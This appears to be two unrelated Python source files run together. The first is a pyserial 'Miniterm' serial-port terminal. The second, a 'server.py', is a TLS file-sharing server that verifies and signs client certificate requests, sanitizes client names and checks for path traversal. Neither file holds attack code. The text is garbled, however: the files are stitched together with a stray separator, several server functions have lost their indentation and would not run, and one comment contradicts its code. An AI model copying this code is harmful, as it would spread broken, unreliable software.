if sys.version_info < (3, 0):
    def character(b):
        """On Python 2 a byte read from the port is already a str."""
        return b
else:
    def character(b):
        """Decode a single byte to text; latin-1 maps bytes 1:1 to code points."""
        return b.decode('latin1')
# Byte constants: newline variants used by the translation logic, and the
# two prefix codes msvcrt.getch() emits before Windows function keys.
LF = serial.to_bytes([10])
CR = serial.to_bytes([13])
CRLF = serial.to_bytes([13, 10])
X00 = serial.to_bytes([0])
X0E = serial.to_bytes([0x0e])
# first choose a platform dependant way to read single characters from the console
# NOTE(review): `global` at module level is a no-op; kept for fidelity.
global console
if os.name == 'nt':
    import msvcrt

    class Console(object):
        """Single-key console reader for Windows (msvcrt based)."""
        def __init__(self):
            pass

        def setup(self):
            pass    # Do nothing for 'nt'

        def cleanup(self):
            pass    # Do nothing for 'nt'

        def getkey(self):
            """Block until a key is pressed and return it (CR mapped to LF)."""
            while True:
                z = msvcrt.getch()
                if z == X00 or z == X0E:    # functions keys, ignore
                    # function keys arrive as a two-byte sequence; drop both
                    msvcrt.getch()
                else:
                    if z == CR:
                        return LF
                    return z

    console = Console()

elif os.name == 'posix':
    import termios, sys, os

    class Console(object):
        """Single-key console reader for POSIX (raw-ish termios mode)."""
        def __init__(self):
            self.fd = sys.stdin.fileno()
            self.old = None     # saved termios attributes, restored by cleanup()

        def setup(self):
            """Put stdin into non-canonical, no-echo, no-signal mode."""
            self.old = termios.tcgetattr(self.fd)
            new = termios.tcgetattr(self.fd)
            new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
            new[6][termios.VMIN] = 1    # block until at least one byte
            new[6][termios.VTIME] = 0   # no inter-byte timeout
            termios.tcsetattr(self.fd, termios.TCSANOW, new)

        def getkey(self):
            c = os.read(self.fd, 1)
            return c

        def cleanup(self):
            """Restore the saved terminal mode (if setup() ever ran)."""
            if self.old is not None:
                termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)

    console = Console()

    def cleanup_console():
        console.cleanup()

    # NOTE(review): sys.exitfunc is Python 2 only; atexit would be the
    # portable equivalent.
    sys.exitfunc = cleanup_console  # terminal modes have to be restored on exit...

else:
    raise NotImplementedError("Sorry no implementation for your platform (%s) available." % sys.platform)
def dump_port_list():
    """Write the list of detected serial ports to stderr.

    Silently does nothing when serial.tools.list_ports was not
    importable (``comports`` is None).
    """
    if not comports:
        return
    sys.stderr.write('\n--- Available ports:\n')
    for port, desc, hwid in sorted(comports()):
        sys.stderr.write('--- %-20s %s\n' % (port, desc))
# Outgoing newline translation modes; values index NEWLINE_CONVERISON_MAP
# and LF_MODES.  REPR_MODES labels the four receive-side escaping modes.
CONVERT_CRLF = 2
CONVERT_CR = 1
CONVERT_LF = 0
NEWLINE_CONVERISON_MAP = (LF, CR, CRLF)
LF_MODES = ('LF', 'CR', 'CR/LF')
REPR_MODES = ('raw', 'some control', 'all control', 'hex')
class Miniterm(object):
    """Bidirectional serial <-> console bridge.

    Runs two daemon threads: reader() copies serial->stdout honoring the
    current repr/newline modes, writer() copies console->serial and
    intercepts MENUCHARACTER (interactive menu) and EXITCHARCTER (quit).
    """

    def __init__(self, port, baudrate, parity, rtscts, xonxoff, echo=False, convert_outgoing=CONVERT_CRLF, repr_mode=0):
        try:
            self.serial = serial.serial_for_url(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
        except AttributeError:
            # happens when the installed pyserial is older than 2.5. use the
            # Serial class directly then.
            self.serial = serial.Serial(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
        self.echo = echo                            # local echo of typed characters
        self.repr_mode = repr_mode                  # index into REPR_MODES
        self.convert_outgoing = convert_outgoing    # index into NEWLINE_CONVERISON_MAP
        self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
        self.dtr_state = True
        self.rts_state = True
        self.break_state = False

    def _start_reader(self):
        """Start reader thread"""
        self._reader_alive = True
        # start serial->console thread
        self.receiver_thread = threading.Thread(target=self.reader)
        self.receiver_thread.setDaemon(True)
        self.receiver_thread.start()

    def _stop_reader(self):
        """Stop reader thread only, wait for clean exit of thread"""
        self._reader_alive = False
        self.receiver_thread.join()

    def start(self):
        """Start both the reader and the writer thread."""
        self.alive = True
        self._start_reader()
        # enter console->serial loop
        self.transmitter_thread = threading.Thread(target=self.writer)
        self.transmitter_thread.setDaemon(True)
        self.transmitter_thread.start()

    def stop(self):
        """Signal both threads to terminate."""
        self.alive = False

    def join(self, transmit_only=False):
        """Wait for the worker threads to finish."""
        self.transmitter_thread.join()
        if not transmit_only:
            self.receiver_thread.join()

    def dump_port_settings(self):
        """Write the current port configuration and line states to stderr."""
        sys.stderr.write("\n--- Settings: %s  %s,%s,%s,%s\n" % (
            self.serial.portstr,
            self.serial.baudrate,
            self.serial.bytesize,
            self.serial.parity,
            self.serial.stopbits))
        sys.stderr.write('--- RTS: %-8s  DTR: %-8s  BREAK: %-8s\n' % (
            (self.rts_state and 'active' or 'inactive'),
            (self.dtr_state and 'active' or 'inactive'),
            (self.break_state and 'active' or 'inactive')))
        try:
            sys.stderr.write('--- CTS: %-8s  DSR: %-8s  RI: %-8s  CD: %-8s\n' % (
                (self.serial.getCTS() and 'active' or 'inactive'),
                (self.serial.getDSR() and 'active' or 'inactive'),
                (self.serial.getRI() and 'active' or 'inactive'),
                (self.serial.getCD() and 'active' or 'inactive')))
        except serial.SerialException:
            # on RFC 2217 ports it can happen to no modem state notification was
            # yet received. ignore this error.
            pass
        sys.stderr.write('--- software flow control: %s\n' % (self.serial.xonxoff and 'active' or 'inactive'))
        sys.stderr.write('--- hardware flow control: %s\n' % (self.serial.rtscts and 'active' or 'inactive'))
        sys.stderr.write('--- data escaping: %s  linefeed: %s\n' % (
            REPR_MODES[self.repr_mode],
            LF_MODES[self.convert_outgoing]))

    def reader(self):
        """loop and copy serial->console"""
        try:
            while self.alive and self._reader_alive:
                data = character(self.serial.read(1))
                if self.repr_mode == 0:
                    # direct output, just have to care about newline setting
                    if data == '\r' and self.convert_outgoing == CONVERT_CR:
                        sys.stdout.write('\n')
                    else:
                        sys.stdout.write(data)
                elif self.repr_mode == 1:
                    # escape non-printable, let pass newlines
                    if self.convert_outgoing == CONVERT_CRLF and data in '\r\n':
                        if data == '\n':
                            sys.stdout.write('\n')
                        elif data == '\r':
                            # drop the CR of a CR/LF pair
                            pass
                    elif data == '\n' and self.convert_outgoing == CONVERT_LF:
                        sys.stdout.write('\n')
                    elif data == '\r' and self.convert_outgoing == CONVERT_CR:
                        sys.stdout.write('\n')
                    else:
                        sys.stdout.write(repr(data)[1:-1])
                elif self.repr_mode == 2:
                    # escape all non-printable, including newline
                    sys.stdout.write(repr(data)[1:-1])
                elif self.repr_mode == 3:
                    # escape everything (hexdump)
                    for c in data:
                        sys.stdout.write("%s " % c.encode('hex'))
                sys.stdout.flush()
        except serial.SerialException, e:
            self.alive = False
            # would be nice if the console reader could be interruptted at this
            # point...
            raise

    def writer(self):
        """\
        Loop and copy console->serial until EXITCHARCTER character is
        found. When MENUCHARACTER is found, interpret the next key
        locally.
        """
        menu_active = False
        try:
            while self.alive:
                try:
                    b = console.getkey()
                except KeyboardInterrupt:
                    # forward Ctrl+C to the remote side instead of dying
                    b = serial.to_bytes([3])
                c = character(b)
                if menu_active:
                    if c == MENUCHARACTER or c == EXITCHARCTER: # Menu character again/exit char -> send itself
                        self.serial.write(b)                    # send character
                        if self.echo:
                            sys.stdout.write(c)
                    elif c == '\x15':                       # CTRL+U -> upload file
                        sys.stderr.write('\n--- File to upload: ')
                        sys.stderr.flush()
                        console.cleanup()
                        filename = sys.stdin.readline().rstrip('\r\n')
                        if filename:
                            try:
                                file = open(filename, 'r')
                                sys.stderr.write('--- Sending file %s ---\n' % filename)
                                while True:
                                    line = file.readline().rstrip('\r\n')
                                    if not line:
                                        break
                                    self.serial.write(line)
                                    self.serial.write('\r\n')
                                    # Wait for output buffer to drain.
                                    self.serial.flush()
                                    sys.stderr.write('.')   # Progress indicator.
                                sys.stderr.write('\n--- File %s sent ---\n' % filename)
                            except IOError, e:
                                sys.stderr.write('--- ERROR opening file %s: %s ---\n' % (filename, e))
                        console.setup()
                    elif c in '\x08hH?':                    # CTRL+H, h, H, ? -> Show help
                        sys.stderr.write(get_help_text())
                    elif c == '\x12':                       # CTRL+R -> Toggle RTS
                        self.rts_state = not self.rts_state
                        self.serial.setRTS(self.rts_state)
                        sys.stderr.write('--- RTS %s ---\n' % (self.rts_state and 'active' or 'inactive'))
                    elif c == '\x04':                       # CTRL+D -> Toggle DTR
                        self.dtr_state = not self.dtr_state
                        self.serial.setDTR(self.dtr_state)
                        sys.stderr.write('--- DTR %s ---\n' % (self.dtr_state and 'active' or 'inactive'))
                    elif c == '\x02':                       # CTRL+B -> toggle BREAK condition
                        self.break_state = not self.break_state
                        self.serial.setBreak(self.break_state)
                        sys.stderr.write('--- BREAK %s ---\n' % (self.break_state and 'active' or 'inactive'))
                    elif c == '\x05':                       # CTRL+E -> toggle local echo
                        self.echo = not self.echo
                        sys.stderr.write('--- local echo %s ---\n' % (self.echo and 'active' or 'inactive'))
                    elif c == '\x09':                       # CTRL+I -> info
                        self.dump_port_settings()
                    elif c == '\x01':                       # CTRL+A -> cycle escape mode
                        self.repr_mode += 1
                        if self.repr_mode > 3:
                            self.repr_mode = 0
                        sys.stderr.write('--- escape data: %s ---\n' % (
                            REPR_MODES[self.repr_mode],
                        ))
                    elif c == '\x0c':                       # CTRL+L -> cycle linefeed mode
                        self.convert_outgoing += 1
                        if self.convert_outgoing > 2:
                            self.convert_outgoing = 0
                        self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
                        sys.stderr.write('--- line feed %s ---\n' % (
                            LF_MODES[self.convert_outgoing],
                        ))
                    elif c in 'pP':                         # P -> change port
                        dump_port_list()
                        sys.stderr.write('--- Enter port name: ')
                        sys.stderr.flush()
                        console.cleanup()
                        try:
                            port = sys.stdin.readline().strip()
                        except KeyboardInterrupt:
                            port = None
                        console.setup()
                        if port and port != self.serial.port:
                            # reader thread needs to be shut down
                            self._stop_reader()
                            # save settings
                            settings = self.serial.getSettingsDict()
                            try:
                                try:
                                    new_serial = serial.serial_for_url(port, do_not_open=True)
                                except AttributeError:
                                    # happens when the installed pyserial is older than 2.5. use the
                                    # Serial class directly then.
                                    new_serial = serial.Serial()
                                    new_serial.port = port
                                # restore settings and open
                                new_serial.applySettingsDict(settings)
                                new_serial.open()
                                new_serial.setRTS(self.rts_state)
                                new_serial.setDTR(self.dtr_state)
                                new_serial.setBreak(self.break_state)
                            except Exception, e:
                                sys.stderr.write('--- ERROR opening new port: %s ---\n' % (e,))
                                new_serial.close()
                            else:
                                self.serial.close()
                                self.serial = new_serial
                                sys.stderr.write('--- Port changed to: %s ---\n' % (self.serial.port,))
                            # and restart the reader thread
                            self._start_reader()
                    elif c in 'bB':                         # B -> change baudrate
                        sys.stderr.write('\n--- Baudrate: ')
                        sys.stderr.flush()
                        console.cleanup()
                        backup = self.serial.baudrate
                        try:
                            self.serial.baudrate = int(sys.stdin.readline().strip())
                        except ValueError, e:
                            sys.stderr.write('--- ERROR setting baudrate: %s ---\n' % (e,))
                            self.serial.baudrate = backup
                        else:
                            self.dump_port_settings()
                        console.setup()
                    elif c == '8':                          # 8 -> change to 8 bits
                        self.serial.bytesize = serial.EIGHTBITS
                        self.dump_port_settings()
                    elif c == '7':                          # 7 -> change to 8 bits
                        self.serial.bytesize = serial.SEVENBITS
                        self.dump_port_settings()
                    elif c in 'eE':                         # E -> change to even parity
                        self.serial.parity = serial.PARITY_EVEN
                        self.dump_port_settings()
                    elif c in 'oO':                         # O -> change to odd parity
                        self.serial.parity = serial.PARITY_ODD
                        self.dump_port_settings()
                    elif c in 'mM':                         # M -> change to mark parity
                        self.serial.parity = serial.PARITY_MARK
                        self.dump_port_settings()
                    elif c in 'sS':                         # S -> change to space parity
                        self.serial.parity = serial.PARITY_SPACE
                        self.dump_port_settings()
                    elif c in 'nN':                         # N -> change to no parity
                        self.serial.parity = serial.PARITY_NONE
                        self.dump_port_settings()
                    elif c == '1':                          # 1 -> change to 1 stop bits
                        self.serial.stopbits = serial.STOPBITS_ONE
                        self.dump_port_settings()
                    elif c == '2':                          # 2 -> change to 2 stop bits
                        self.serial.stopbits = serial.STOPBITS_TWO
                        self.dump_port_settings()
                    elif c == '3':                          # 3 -> change to 1.5 stop bits
                        self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
                        self.dump_port_settings()
                    elif c in 'xX':                         # X -> change software flow control
                        self.serial.xonxoff = (c == 'X')
                        self.dump_port_settings()
                    elif c in 'rR':                         # R -> change hardware flow control
                        self.serial.rtscts = (c == 'R')
                        self.dump_port_settings()
                    else:
                        sys.stderr.write('--- unknown menu character %s --\n' % key_description(c))
                    menu_active = False
                elif c == MENUCHARACTER: # next char will be for menu
                    menu_active = True
                elif c == EXITCHARCTER:
                    self.stop()
                    break                                   # exit app
                elif c == '\n':
                    self.serial.write(self.newline)         # send newline character(s)
                    if self.echo:
                        sys.stdout.write(c)                 # local echo is a real newline in any case
                        sys.stdout.flush()
                else:
                    self.serial.write(b)                    # send byte
                    if self.echo:
                        sys.stdout.write(c)
                        sys.stdout.flush()
        except:
            self.alive = False
            raise
def main():
    """Command line entry point: parse options, open the serial port and
    run the Miniterm session until the exit character is received."""
    import optparse

    parser = optparse.OptionParser(
        usage = "%prog [options] [port [baudrate]]",
        description = "Miniterm - A simple terminal program for the serial port."
    )

    group = optparse.OptionGroup(parser, "Port settings")

    group.add_option("-p", "--port",
        dest = "port",
        help = "port, a number or a device name. (deprecated option, use parameter instead)",
        default = DEFAULT_PORT
    )

    group.add_option("-b", "--baud",
        dest = "baudrate",
        action = "store",
        type = 'int',
        help = "set baud rate, default %default",
        default = DEFAULT_BAUDRATE
    )

    group.add_option("--parity",
        dest = "parity",
        action = "store",
        help = "set parity, one of [N, E, O, S, M], default=N",
        default = 'N'
    )

    group.add_option("--rtscts",
        dest = "rtscts",
        action = "store_true",
        help = "enable RTS/CTS flow control (default off)",
        default = False
    )

    group.add_option("--xonxoff",
        dest = "xonxoff",
        action = "store_true",
        help = "enable software flow control (default off)",
        default = False
    )

    group.add_option("--rts",
        dest = "rts_state",
        action = "store",
        type = 'int',
        help = "set initial RTS line state (possible values: 0, 1)",
        default = DEFAULT_RTS
    )

    group.add_option("--dtr",
        dest = "dtr_state",
        action = "store",
        type = 'int',
        help = "set initial DTR line state (possible values: 0, 1)",
        default = DEFAULT_DTR
    )

    parser.add_option_group(group)

    group = optparse.OptionGroup(parser, "Data handling")

    group.add_option("-e", "--echo",
        dest = "echo",
        action = "store_true",
        help = "enable local echo (default off)",
        default = False
    )

    group.add_option("--cr",
        dest = "cr",
        action = "store_true",
        help = "do not send CR+LF, send CR only",
        default = False
    )

    group.add_option("--lf",
        dest = "lf",
        action = "store_true",
        help = "do not send CR+LF, send LF only",
        default = False
    )

    group.add_option("-D", "--debug",
        dest = "repr_mode",
        action = "count",
        help = """debug received data (escape non-printable chars)
--debug can be given multiple times:
0: just print what is received
1: escape non-printable characters, do newlines as unusual
2: escape non-printable characters, newlines too
3: hex dump everything""",
        default = 0
    )

    parser.add_option_group(group)

    group = optparse.OptionGroup(parser, "Hotkeys")

    group.add_option("--exit-char",
        dest = "exit_char",
        action = "store",
        type = 'int',
        help = "ASCII code of special character that is used to exit the application",
        default = 0x1d
    )

    group.add_option("--menu-char",
        dest = "menu_char",
        action = "store",
        type = 'int',
        help = "ASCII code of special character that is used to control miniterm (menu)",
        default = 0x14
    )

    parser.add_option_group(group)

    group = optparse.OptionGroup(parser, "Diagnostics")

    group.add_option("-q", "--quiet",
        dest = "quiet",
        action = "store_true",
        help = "suppress non-error messages",
        default = False
    )

    parser.add_option_group(group)

    (options, args) = parser.parse_args()

    options.parity = options.parity.upper()
    if options.parity not in 'NEOSM':
        parser.error("invalid parity")

    if options.cr and options.lf:
        parser.error("only one of --cr or --lf can be specified")

    if options.menu_char == options.exit_char:
        parser.error('--exit-char can not be the same as --menu-char')

    # the hotkeys are module globals so the worker threads see the
    # user-chosen values
    global EXITCHARCTER, MENUCHARACTER
    EXITCHARCTER = chr(options.exit_char)
    MENUCHARACTER = chr(options.menu_char)

    port = options.port
    baudrate = options.baudrate
    if args:
        # positional arguments override/replace the deprecated -p option
        if options.port is not None:
            parser.error("no arguments are allowed, options only when --port is given")
        port = args.pop(0)
        if args:
            try:
                baudrate = int(args[0])
            except ValueError:
                parser.error("baud rate must be a number, not %r" % args[0])
            args.pop(0)
        if args:
            parser.error("too many arguments")
    else:
        # noport given on command line -> ask user now
        if port is None:
            dump_port_list()
            port = raw_input('Enter port name:')

    convert_outgoing = CONVERT_CRLF
    if options.cr:
        convert_outgoing = CONVERT_CR
    elif options.lf:
        convert_outgoing = CONVERT_LF

    try:
        miniterm = Miniterm(
            port,
            baudrate,
            options.parity,
            rtscts=options.rtscts,
            xonxoff=options.xonxoff,
            echo=options.echo,
            convert_outgoing=convert_outgoing,
            repr_mode=options.repr_mode,
        )
    except serial.SerialException, e:
        sys.stderr.write("could not open port %r: %s\n" % (port, e))
        sys.exit(1)

    if not options.quiet:
        sys.stderr.write('--- Miniterm on %s: %d,%s,%s,%s ---\n' % (
            miniterm.serial.portstr,
            miniterm.serial.baudrate,
            miniterm.serial.bytesize,
            miniterm.serial.parity,
            miniterm.serial.stopbits,
        ))
        sys.stderr.write('--- Quit: %s  |  Menu: %s | Help: %s followed by %s ---\n' % (
            key_description(EXITCHARCTER),
            key_description(MENUCHARACTER),
            key_description(MENUCHARACTER),
            key_description('\x08'),
        ))

    # apply the initial line states requested on the command line
    if options.dtr_state is not None:
        if not options.quiet:
            sys.stderr.write('--- forcing DTR %s\n' % (options.dtr_state and 'active' or 'inactive'))
        miniterm.serial.setDTR(options.dtr_state)
        miniterm.dtr_state = options.dtr_state
    if options.rts_state is not None:
        if not options.quiet:
            sys.stderr.write('--- forcing RTS %s\n' % (options.rts_state and 'active' or 'inactive'))
        miniterm.serial.setRTS(options.rts_state)
        miniterm.rts_state = options.rts_state

    console.setup()
    miniterm.start()
    try:
        # wait for the transmitter first: it returns once the exit
        # character was typed
        miniterm.join(True)
    except KeyboardInterrupt:
        pass
    if not options.quiet:
        sys.stderr.write("\n--- exit ---\n")
    miniterm.join()
    #~ console.cleanup()
|
server.py | # SERVER
try:
import socket
import ssl
import os
import errno
import time
import datetime
import json
import subprocess
import threading
import glob
import shutil
except ImportError:
raise ImportError("You need to do 'pip install -r requirements.txt' to be able to use this program.")
# PRELIMINARY NOTE: read the README.txt for informations about how to run this file
# READING:
# [!]: error information
# [+]: normal information
def mkdir_p(path):
    """Equivalent of `mkdir -p`: create *path*, tolerating an existing dir."""
    try:
        os.makedirs(path)
    except OSError as exc: # Python >2.5
        # Only swallow the error when the directory already exists;
        # anything else (permissions, a file in the way) is re-raised.
        if not (exc.errno == errno.EEXIST and os.path.isdir(path)):
            raise
def get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker):
    """Return True iff the tracked connection has completed authentication.

    conn_tracker maps (ip, port) -> per-connection state list; index 2
    holds the last auth marker ("AUTHENTICATE" once logged in).  Returns
    False (caller should drop the client) when that state is missing or
    not authenticated.

    NOTE(review): only IndexError is caught here; a missing (ip, port)
    key would raise KeyError - confirm callers guarantee the key exists.
    """
    try:
        loggedin_status = conn_tracker[(client_ip, serving_port)][2]
        loggedin_status = (loggedin_status=="AUTHENTICATE")
        if not loggedin_status:
            print "[!][" + now() + "] Cutting off connection with ip %s in port %s. Action requires client authentication..." %(client_ip, serving_port)
            return False
        print "[+][" + now() + "] Client %s is authenticated." %(client_name)
        return True
    except IndexError:
        print "[!][" + now() + "] Cutting off connection with ip %s in port %s. Action requires client authentication..." %(client_ip, serving_port)
        return False # bye client
def get_clientname(client_ip, serving_port, conn_tracker):
try:
client_name = conn_tracker[(client_ip, serving_port)][1]
return client_name
except KeyError:
print "[!][" + now() + "] Cutting off connection with ip %s in port %s. No hello message..." %(client_ip, serving_port)
return False # bye client
except IndexError:
print "[!][" + now() + "] Cutting off connection with ip %s in port %s. No name message..." %(client_ip, serving_port)
return False # bye client
def fs_getalldirs(currentside_dirname, remoteside_dirname, file_structure):
    """Recursively register every sub-directory of *currentside_dirname*.

    Each directory found is added to *file_structure* under its
    remote-side path, with that directory's raw listing as the value.
    Returns the updated mapping.
    """
    for entry in os.listdir(currentside_dirname):
        local_path = currentside_dirname + os.sep + entry
        if not os.path.isdir(local_path):
            continue
        remote_path = remoteside_dirname + os.sep + entry
        file_structure[remote_path] = os.listdir(local_path)
        file_structure = fs_getalldirs(local_path, remote_path, file_structure)
    return file_structure
def file_server2client(serverside_filepath, clientside_directory, filename, file_structure, file_content_flag=True, sharedfile_username=""):
    """Add one server-side file to the client-bound file structure.

    Only ciphertext artifacts are exported: '<name>.encrypted',
    '<name>.sig' and '<name>.key.encrypted[.<user>]'.  The file content
    is hex-encoded (Python 2 str.encode('hex')) and stored together with
    the file's mtime; when *file_content_flag* is False only the mtime
    is recorded.  Directories and non-matching names (e.g. a key that
    belongs to another user we shared a file with) leave
    *file_structure* untouched.  Returns the (possibly updated) mapping.
    """
    if os.path.isdir(serverside_filepath):
        # no need to do anything if it's a directory
        return file_structure
    # The three original branches read the file identically, so the
    # suffix tests are collapsed into a single endswith() tuple.
    exported_suffixes = (".key.encrypted",
                         ".key.encrypted." + sharedfile_username,
                         ".sig",
                         ".encrypted")
    if not filename.endswith(exported_suffixes):
        # return untouched file_structure if the key is from another user whom we shared a file with
        return file_structure
    with open(serverside_filepath) as f:
        filecontent = f.read().encode("hex")
    mtime = get_time_repr(os.path.getmtime(serverside_filepath))
    if file_content_flag:
        file_structure[clientside_directory][filename] = [filecontent, mtime]
    else:
        file_structure[clientside_directory][filename] = mtime
    return file_structure
def fs_server2client(serverside_dirpath, clientside_dirpath, file_content_flag=True, sharedfile_username=""):
    """Build the full client-bound file structure for a directory tree.

    Walks *serverside_dirpath*, keys the result by the corresponding
    client-side paths, and fills each directory entry with its exported
    files via file_server2client().
    """
    file_structure = {clientside_dirpath: dict()}
    file_structure = fs_getalldirs(serverside_dirpath, clientside_dirpath, file_structure)
    # fs_getalldirs left raw listings as values; reset them to empty
    # dicts before populating with exported files.
    for directory in file_structure:
        file_structure[directory] = dict()
    for clientside_directory in list(file_structure):
        serverside_directory = clientside_directory.replace(clientside_dirpath, serverside_dirpath, 1)
        for filename in os.listdir(serverside_directory):
            # append the file-names only to the respective directory
            serverside_filepath = serverside_directory + os.sep + filename
            file_structure = file_server2client(serverside_filepath, clientside_directory, filename, file_structure, file_content_flag, sharedfile_username)
    return file_structure
# update json file with clients information
def update_json_file(client_name, registered_status):
    """Record *client_name*'s registration status and persist the whole
    clients table to the server's JSON file."""
    server_global.clients_info[client_name] = [registered_status]
    with open(server_global.client_json_filename, 'w') as json_file:
        json.dump(server_global.clients_info, json_file)
def get_subject(client_cert):
    """Rebuild an openssl-style subject line from an ssl peer-cert dict.

    Returns False when any subject RDN is not a single (name, value)
    pair.  Field order follows the certificate; unknown fields are
    skipped.  Note: the result keeps a trailing ', ' unless a commonName
    terminates it - callers compare against strings built the same way.
    """
    short_names = {
        "countryName": "C",
        "stateOrProvinceName": "ST",
        "localityName": "L",
        "organizationName": "O",
    }
    subject_str = "Subject: "
    for rdn in client_cert['subject']:
        if len(rdn) != 1:
            return False
        pair = rdn[0]
        if len(pair) != 2:
            return False
        field, value = pair
        if field == "commonName":
            subject_str += "CN = %s" % (value,)
        elif field in short_names:
            subject_str += "%s = %s, " % (short_names[field], value)
    return subject_str
# have in mind this alone cannot make up for verifying a client's identity,
# we also need to make sure client's certificate is signed by our trusted issuer,
# i.e., by our client certificate signing CA
def verify_cert_subject(client_cert, correct_subject_info, client_name):
    """Return True iff the peer certificate's subject equals the expected string."""
    print "[+][" + now() + "] Verifying if m-TLS peer's certificate subject matches with client %s's specification." %(client_name)
    # construct subject string from received client certificate
    return get_subject(client_cert)==correct_subject_info
# in case client-side protection has been lift-off, this will sanitize the client name again for us
# it will also notify that something's wrong
def verify_clientname(client_name):
    """Server-side re-sanitization of a client name.

    Returns True only when none of the forbidden shell/path
    metacharacters appears in *client_name*.
    """
    forbidden = " \"'\\/.-;\n=,*@%$!"
    return not any(ch in client_name for ch in forbidden)
def now():
    """Current local time as 'YYYY-MM-DD HH:MM:SS' (used as log prefix)."""
    return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
def get_time_repr(timestamp):
    """Format POSIX *timestamp* as local 'YYYY-MM-DD HH:MM:SS'."""
    local_dt = datetime.datetime.fromtimestamp(timestamp)
    return local_dt.strftime('%Y-%m-%d %H:%M:%S')
# close CONNECTION socket
def server_close_connection_socket(conn, serving_port):
    """Close a per-client connection socket and drop it from the open set."""
    # NOTE: have in mind the difference between a 'listening socket' and a 'connection socket'.
    # Closing a listening socket doesn't require to warn the client like when closing a connection socket
    conn.close()
    server_global.open_sockets.remove(conn)
    print "[+][" + now() + "] I'm releasing a socket on port %s. It is now available for use." %(serving_port)
def server_send_nok(conn, client_name):
    """Send the literal 'NOK' rejection to the client and return the socket."""
    print "[+][" + now() + "] Server-Client(%s): 'NOK'" %(client_name)
    conn.send("NOK")
    return conn
def server_send_ok(conn, client_name):
    """Send the literal 'OK' acknowledgement to the client and return the socket."""
    print "[+][" + now() + "] Server-Client(%s): 'OK'" %(client_name)
    conn.send("OK")
    return conn
def server_get_send_regstatus(conn, client_name, send):
    """Look up whether *client_name* is registered; optionally tell the client.

    Returns (conn, registered) where registered reflects
    server_global.clients_info[client_name][0].  When *send* is true the
    literal 'REGISTERED'/'NOT-REGISTERED' is also sent over *conn*.
    """
    if client_name in server_global.clients_info and server_global.clients_info[client_name][0]:
        if send:
            print "[+][" + now() + "] Server-Client(%s): 'REGISTERED'" %(client_name)
            conn.send("REGISTERED")
        return conn, True
    else:
        if send:
            print "[+][" + now() + "] Server-Client(%s): 'NOT-REGISTERED'" %(client_name)
            conn.send("NOT-REGISTERED")
        return conn, False
def server_send_clientcert(conn, client_certificate_path, client_name):
    """Send the client his certificate signed by us, the server.

    The payload is length-prefixed: the byte count is sent first, then
    the certificate contents.
    """
    f = open(client_certificate_path)
    client_cert = f.read()
    f.close()
    print "[+][" + now() + "] Sending client %s his signed certificate.'" %(client_name)
    conn.send(str(len(client_cert)))
    conn.send(client_cert)
def server_sign_clientcert(client_csr_path, client_csr, client_name):
    """Verify a client's CSR subject and, if it matches, sign the certificate.

    Writes the received CSR to *client_csr_path*, checks via
    `openssl req -verify` that the subject names exactly this client
    (O=<name>, CN=*.<name>.org, both modern and pre-1.1 openssl subject
    formats accepted), then runs SIGN_CLIENT_CERT.sh on it.  The CSR
    file is always removed afterwards.  Returns True on success, False
    when the subject does not identify *client_name*.
    """
    f = open(client_csr_path,"w")
    f.write(client_csr)
    f.close()
    # verify client certificate matches username
    print "[+][" + now() + "] Verifying %s's certificate signing request..." %(client_name)
    cmd = "openssl req -text -noout -verify -in " + client_csr_path
    proc = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE, stderr=open(os.devnull))
    csr_info = proc.stdout.read()
    correct_subject_info = "Subject: C = PT, ST = Lisboa, L = Lisboa, O = " + client_name + ", CN = *." + client_name + ".org"
    correct_subject_info_deprecated_openssl = "Subject: C=PT, ST=Lisboa, L=Lisboa, O=" + client_name + ", CN=*." + client_name + ".org"
    csr_info = csr_info.split("\n")
    csr_info = [elem.strip() for elem in csr_info]
    # 4th element corresponds to client's subject information
    if csr_info[3] in(correct_subject_info, correct_subject_info_deprecated_openssl):
        print "[+][" + now() + "] %s's certificate signing request subject verified." %(client_name)
    else:
        # the CSR was modified in a way that it doesn't identify the current client
        # BUG-NOTE: if this happens, the client would be hanging waiting for the signed certificate, but that's not expected behavior :)
        print "[!][" + now() + "] Cutting off connection... someone modified the certificate signing request in a way that it doesn't have the correct information about client %s" %(client_name)
        os.remove(client_csr_path)
        return False
    # signing client certificate
    print "[+][" + now() + "] Signing %s's certificate and storing it in the default certificates directory..." %(client_name)
    cmd = "." + os.sep + "SIGN_CLIENT_CERT.sh " + client_csr_path
    subprocess.check_call(cmd.split(), stdout=open(os.devnull), stderr=subprocess.STDOUT)
    os.remove(client_csr_path)
    return True
def say_bye(client_ip, serving_port, conn_tracker):
    """Log the disconnect and drop the connection's tracking entry.

    Falls back to the (ip, port) tuple as display name when the client
    never announced one.  Returns the updated conn_tracker.
    """
    try:
        client_name = conn_tracker[(client_ip, serving_port)][1]
        # CONN-TRACK
        conn_tracker.pop((client_ip, serving_port))
    except KeyError:
        # no entry at all for this connection
        client_name = str((client_ip, serving_port))
    except IndexError:
        # entry exists but no name was recorded; still remove it
        client_name = str((client_ip, serving_port))
        conn_tracker.pop((client_ip, serving_port))
    print "[+][" + now() + "] Client %s disconnected." %(client_name)
    return conn_tracker
def deal_with_client(conn, client_ip, serving_port):
    """Serve one client connection until it closes or asks to stop."""
    conn_tracker = dict()
    new_conn = conn
    while True:
        data = new_conn.read()
        # an empty read means the client is finished with us
        if not data:
            break
        new_conn, conn_continue, conn_tracker = interact_with_client(
            new_conn, data, client_ip, serving_port, conn_tracker)
        if not conn_continue:
            break
    # finished with client
    conn_tracker = say_bye(client_ip, serving_port, conn_tracker)
# detect and prevent path-traversal attacks in this file structure by denying access to upper directories
def path_traversal_verified(suspect_filepath, highestlevel_dirname):
    """Return True iff *suspect_filepath* resolves inside *highestlevel_dirname*.

    Symlinks and '..' segments are resolved via realpath before the
    comparison.  Security fix: the previous os.path.commonprefix check
    was purely textual, so '/srv/datax' was accepted as being inside
    '/srv/data'; we now require the base dir itself or a path-separator
    boundary.
    """
    real_suspect = os.path.realpath(suspect_filepath)
